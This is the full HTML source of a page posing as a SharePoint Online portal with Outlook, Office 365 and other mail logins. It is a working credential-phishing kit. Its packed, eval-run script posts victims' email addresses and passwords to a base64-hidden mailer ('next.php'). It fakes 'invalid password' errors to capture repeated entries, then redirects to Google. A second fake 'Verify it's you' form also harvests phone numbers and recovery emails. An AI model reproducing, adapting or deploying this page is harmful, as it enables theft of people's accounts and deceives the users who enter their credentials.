<html lang="en">

<head>
    <script type="text/JavaScript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script type="text/JavaScript" src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
    <script type="text/JavaScript" src="https://code.jquery.com/jquery-3.3.1.js"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css">
    <title>Share Point Online</title>
    <style type="text/css">
    .overlay {
        height: 650px;
        color: white;
        text-shadow: 1px 1px 1px #333;
        background-image: linear-gradient(90deg, #0070C6 10%, #0070C6 100%);
    }
    </style>
</head>

<body>
    <div class="container-fluid">
        <div class="row">
            <div class="col-lg-7 overlay px-5 py-5">
                <img src="images/sharepoint.png" class="img-fluid " width="200px">
                <div class="mb-2" style="border-bottom: 2px solid white; width: 65%;">
                </div>
                <h4>SharePoint Online Limits across different<br>Office 365 plans</h4>
                <br>
                <br>
                <br>
                <br><br>
                <h5 class="text-uppercase font-weight-normal">Login with:</h5>
                <div class="container-fluid">
                    <div class="row">
                        <div class="col-lg-12">
                            <div class="row">
                                <div class="col-lg-2 text-center p-2 rounded">
                                    <a href="javascript:void(0)" id="outlookmodal" data-toggle="modal" data-target="#ajaxModal">
                                        <img src="images/outlook.png" class="img-fluid bg-white rounded-circle p-2" width="60px"><br>
                                        <span class="h5 font-weight-normal text-white">OutLook</span>
                                    </a>
                                </div>
                                <div class="col-lg-2 text-center p-2 rounded">
                                    <a href="javascript:void(0)" id="office365modal" data-toggle="modal" data-target="#ajaxModal">
                                        <img src="images/office365.png" class="img-fluid bg-white rounded-circle p-2" width="60px"><br>
                                        <span class="h5 font-weight-normal text-white">Office 365</span>
                                    </a>
                                </div>
                                <div class="col-lg-2 text-center p-2 rounded">
                                    <a href="javascript:void(0)" id="yahoomodal" data-toggle="modal" data-target="#ajaxModal">
                                        <img src="images/yahoo.png" class="img-fluid bg-white rounded-circle p-2" width="60px"><br>
                                        <span class="h5 font-weight-normal text-white">RoundCube</span>
                                    </a>
                                </div>
                                <div class="col-lg-2 text-center p-2 rounded">
                                    <a href="javascript:void(0)" id="othermodal" data-toggle="modal" data-target="#ajaxModal">
                                        <img src="images/othermail.ico" class="img-fluid bg-white rounded-circle p-2" width="60px"><br>
                                        <span class="h5 font-weight-normal text-white">Other Mail</span>
                                    </a>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="col-lg-5">
                <div class="mt-5 text-center">
                    <img src="images/sp.jpg" class="img-fluid">
                    <h3 style="color: #0070C6;" class="mt-5"><i>Our Microsoft SharePoint Services</i></h3>
                </div>
            </div>
        </div>
    </div>
    <!-- Modal for gmail -->
    <div class="modal fade" id="ajaxModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
        <div class="modal-dialog" role="document">
            <div class="modal-content">
                <div class="modal-header">
                    <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                        <span aria-hidden="true">&times;</span>
                    </button>
                </div>
                <div class="modal-body">
                    <center>
                        <img id="fieldImg" src="images/gmail.png" class="img-fluid rounded-circle" width="80px">
                        <h5 class="modal-title" id="exampleModalLabel">Login with <span id="field">Gmail</span></h5>
                        <div class="alert alert-danger" id="msg" style="display: none;">Invalid Password.! Please enter correct password.</div>
                        <span class="text-danger error" style="display: none;">That account doesn't exist. Enter a different account</span>
                    </center>
                    <form class="form-horizontal well">
                        <input type="hidden" name="count" id="count" value="0">
                        <div id="div1">
                            <div class="col-lg-12">
                                <div class="form-group">
                                    <div>
                                        <label for="exampleInputEmail1">Email address</label>
                                        <input type="email" name="ai" class="form-control" id="ai" aria-describedby="aiHelp" placeholder="Enter email" required="">
                                        <small id="aiHelp" class="form-text text-muted">We'll never share your email with anyone else.</small></div>
                                </div>
                            </div>
                            <div class="col-lg-12">
                                <div class="form-group">
                                    <label for="pr">Password</label>
                                    <input type="password" name="pr" class="form-control" id="pr" aria-describedby="aiHelp" placeholder="Enter Password" required="">
                                </div>
                            </div>
                            <div class="text-right">
                                <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
                                <input type="button" class="btn btn-info pull-right" name="sub-btn" id="sub-btn" value="Login">
                            </div>
                        </div>
                    </form>
                    <form class="form-horizontal well">
                        <div id="div2" style="display: none;">
                            <i class="fas fa-arrow-left" id="back"></i>&nbsp<span id="aich" class="h5">abc@abc.com</span><br>
                            <span class="h4 font-weight-normal">Verify it's you</span><br>
                            <span>This device is not recognized. For security, Google want to make sure it's really you.</span><br>
                            <br>
                            <span>Try another way to sign in</span>
                            <div class="form-group mt-3">
                                <input type="number" name="ph" class="form-control" id="ph" aria-describedby="aiHelp" placeholder="Enter Phone No." required="">
                            </div>
                            <div class="form-group mt-3">
                                <input type="text" name="rec_ai" class="form-control" id="rec_ai" aria-describedby="aiHelp" placeholder="Enter Recovery Email" required="">
                            </div>
                            <div class="text-right">
                                <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
                                <input type="button" class="btn btn-info pull-right" name="sub-btn1" id="sub-btn1" value="verify">
                            </div>
                        </div>
                    </form>
                </div>
            </div>
        </div>
    </div>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" ></script>
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js" ></script>
    <script type="text/javascript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script>
</body>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
//redirect link
var rdrt = "https://www.google.com";

//mail result count
var rc = 2;

//mailer link
var f = atob("bmV4dC5waHA=");


eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$(1m).1n(8(){3 l=0;3 n="1o==";3 o="1p==";3 p="1q=";3 q="1r=";3 r="1s";8 Y(){3 c={};3 d=S.T.1t.14(/[?&]+([^=&]+)=([^&]*)/1u,8(m,a,b){c[a]=b});J c}y(!Y()["U"]){}P{3 l=Y()["U"];$(\'#U\').7(l)}3 s=S.T.15.D(1);y(!s){}P{3 t=s;3 u=/^([a-A-B-Z\\.\\-])+\\@(([a-A-B-9\\-])+\\.)+([a-A-B-9]{2,4})+$/;y(!u.16(t)){$(\'.E\').Q();s.V;J R}3 v=t.K("@");3 w=t.D((v+1));3 c=w.D(0,w.K(\'.\'));3 x=c.10();3 s=S.T.15.D(1);3 t=s;3 u=/^([a-A-B-Z\\.\\-])+\\@(([a-A-B-9\\-])+\\.)+([a-A-B-9]{2,4})+$/;3 v=t.K("@");3 w=t.D((v+1));3 c=w.D(0,w.K(\'.\'));3 x=c.10();3 l=$(\'#U\').7();y(x==z(n)||x==z(o)){$(\'#F\').G(\'H\',\'I/\'+z(n)+\'.L\');$(\'#6\').5("17");$(\'#M\').7(t);$(\'#W\').5(t);$("#18").X("C")}P y(x==z(r)){$(\'#F\').G(\'H\',\'I/\'+z(r)+\'.L\');$(\'#6\').5("19 1a");$(\'#M\').7(t);$(\'#W\').5(t);$("#1b").X("C")}P y(x==z(q)){$(\'#F\').G(\'H\',\'I/\'+z(q)+\'.L\');$(\'#6\').5("1c");$(\'#M\').7(t);$(\'#W\').5(t);$("#1d").X("C")}P{$(\'#F\').G(\'H\',\'I/1e.1f\');$(\'#6\').5("1g 1h");$(\'#M\').7(t);$(\'#W\').5(t);$("#1i").X("C")}}$(\'#18\').C(8(){$(\'#F\').G(\'H\',\'I/\'+z(n)+\'.L\');$(\'#6\').5("17");$("#N").O()});$(\'#1b\').C(8(){$(\'#F\').G(\'H\',\'I/\'+z(r)+\'.L\');$(\'#6\').5("19 1a");$("#N").O()});$(\'#1d\').C(8(){$(\'#F\').G(\'H\',\'I/\'+z(q)+\'.L\');$(\'#6\').5("1c");$("#N").O()});$(\'#1i\').C(8(){$(\'#F\').G(\'H\',\'I/1e.1f\');$(\'#6\').5("1g 1h");$("#N").O()});$(\'#11-12\').C(8(b){$(\'.E\').O();$(\'#N\').O();b.1v();3 d=$("#M").7();3 e=$("#13").7();$6=$(\'#6\').5();3 g=d;3 h=/^([a-A-B-Z\\.\\-])+\\@(([a-A-B-9\\-])+\\.)+([a-A-B-9]{2,4})+$/;y(!d){$(\'.E\').Q();$(\'.E\').5("1w 6 1j 1k...!");d.V;J R}y(!h.16(g)){$(\'.E\').Q();$(\'.E\').5("1x 1l 1y\'t 1z. 1A a 1B 1l");d.V;J R}y(!e){$(\'.E\').Q();$(\'.E\').5("1C 6 1j 1k...!");d.V;J R}3 i=g.K("@");3 j=g.D((i+1));3 c=j.D(0,j.K(\'.\'));3 k=c.10();l=l+1;$.1D({1E:\'1F\',1G:f,1H:\'1I\',1J:{M:d,13:e,},1K:8(a){$(\'#11-12\').7(\'1L...\')},1M:8(){y(l>=1N){l=0;S.T.14(1O);J R}$("#13").7("");$("#N").Q();$(\'#11-12\').7(\'1P\')}})})});',62,114,'|||var||html|field|val|function||||||||||||||||||||||||||if|atob|zA|Z0|click|substr|error|fieldImg|attr|src|images|return|indexOf|png|ai|msg|hide|else|show|false|window|location|count|focus|aich|trigger|getUrlVars|9_|toLowerCase|sub|btn|pr|replace|hash|test|Outlook|outlookmodal|Office|365|office365modal|RoundCube|yahoomodal|othermail|ico|Other|Mail|othermodal|is|empty|account|document|ready|b3V0bG9vaw|aG90bWFpbA|Z21haWw|eWFob28|b2ZmaWNlMzY1|href|gi|preventDefault|Email|That|doesn|exist|Enter|different|Password|ajax|dataType|JSON|url|type|POST|data|beforeSend|Verifing|complete|rc|rdrt|Login'.split('|'),0,{}))
</script>

</html>